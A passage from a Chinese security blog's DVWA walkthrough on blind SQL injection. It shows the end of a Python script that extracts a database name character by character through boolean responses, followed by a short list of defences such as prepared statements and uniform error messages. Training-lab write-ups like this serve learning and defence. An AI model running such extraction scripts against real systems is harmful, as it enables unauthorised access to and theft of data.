class="subst">&#123;mid&#125;</span>#&quot;</span></span><br><span class="line">        params = &#123;<span class="string">&quot;id&quot;</span>: payload, <span class="string">&quot;Submit&quot;</span>: <span class="string">&quot;Submit&quot;</span>&#125;</span><br><span class="line">        r = requests.get(url, params=params, cookies=cookies)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;User ID exists&quot;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            low = mid + <span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            high = mid</span><br><span class="line">    <span class="keyword">if</span> low == <span class="number">32</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    result += <span class="built_in">chr</span>(low)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;Database name: <span class="subst">&#123;result&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;Final result: <span class="subst">&#123;result&#125;</span>&quot;</span>)</span><br></pre></td></tr></table></figure>

<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>盲注虽然慢，但只要有注入点就能拿数据。防护要点和普通 SQL 注入一样：</p>
<ol>
<li>用预处理语句</li>
<li>输入要验证</li>
<li>错误信息统一处理，别让人看出来区别</li>
<li>能用工具就别手工</li>
</ol>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag"><i class="fa fa-tag"></i> Web安全</a>
              <a href="/tags/DVWA/" rel="tag"><i class="fa fa-tag"></i> DVWA</a>
              <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag"><i class="fa fa-tag"></i> SQL注入</a>
              <a href="/tags/%E7%9B%B2%E6%B3%A8/" rel="tag"><i class="fa fa-tag"></i> 盲注</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/02/13/DVWA-SQL-Injection-SQL%E6%B3%A8%E5%85%A5%E9%80%9A%E5%85%B3%E6%95%99%E7%A8%8B/" rel="prev" title="DVWA SQL Injection SQL注入通关教程">
                  <i class="fa fa-angle-left"></i> DVWA SQL Injection SQL注入通关教程
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/02/16/DVWA-Weak-Session-IDs%E5%BC%B1%E4%BC%9A%E8%AF%9DID%E9%80%9A%E5%85%B3%E6%95%99%E7%A8%8B/" rel="next" title="DVWA Weak Session IDs 弱会话ID通关教程">
                  DVWA Weak Session IDs 弱会话ID通关教程 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 2015 – 
    <span itemprop="copyrightYear">2026</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">l1n6yun</span>
  </div>
  <div class="powered-by">由 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & <span class="exturl" data-url="aHR0cHM6Ly90aGVtZS1uZXh0LmpzLm9yZw==">NexT.Gemini</span> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
